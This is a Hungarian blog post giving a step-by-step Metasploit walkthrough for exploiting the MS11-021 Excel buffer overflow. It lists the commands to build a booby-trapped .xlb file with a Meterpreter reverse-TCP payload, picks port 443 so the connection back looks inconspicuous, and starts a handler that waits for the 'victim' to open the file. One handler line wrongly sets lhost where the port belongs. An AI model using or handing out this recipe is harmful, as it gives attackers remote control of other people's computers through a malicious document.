2014. február 15., szombat

MS011-021 Sebezhetőség

Sziasztok! Ma egy Microsoft Office Excel 2007/2010 sebezhetőségről fogok írni, ami egy buffer overflow sebezhetőségen alapszik. Az előző cikkben volt szó a buffer overflow-ról, szóval most nem fejteném ki részletesen.
Szóval először is ha nem lenne fenn akkor töltsük le a Microsoft Office 2007 vagy 2010-es csomagot és telepítsük fel. Az exploitot amit használni fogunk megtaláljuk a Metasploit-ban. Ezen keresztül generálunk egy xlb formátumú fájlt ami nem fog tartalmazni semmit csak egy payloadot amin keresztül be fogunk jutni a rendszerbe. Kezdjük is el! :) Nyissunk egy konzolt és indítsuk el a metasploitot. Ehhez be kell írni, hogy: msfconsole vagy msfpro.
És ha bejött a konzol írjuk be a következő parancsokat:
use windows/fileformat/ms11_021_xlb_bof
set payload windows/meterpreter/reverse_tcp
set lhost ip címed
set lport 443 (ide akármilyen számot írhatsz azért írtam 443-at, hogy ne legyen feltűnő)
exploit
Ezután a metasploit generál egy xlb fájlt ki is fogja írni, hogy hová tette és ezt kell majd megnyitni de mielőtt megnyitnánk a fájlt az áldozat gépen, még  nyitnunk kell egy handlert ahova majd a payload csatlakozni tud:
back
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ip címed
set lhost 443 (azt kell írni amit elsőnek megadtál)
exploit
Mikor az áldozat megnyitja az xlb fájlt akkor ilyesmit fog látni.:
Kész vége lefutott a kód most pedig mennyünk vissza a támadó gépre és ha minden jól ment akkor ezt kell látnunk:

Ez után már azt csinálsz amit csak akarsz. :)
Ennyi lenne remélem érthető volt kösz, hogy elolvastad :)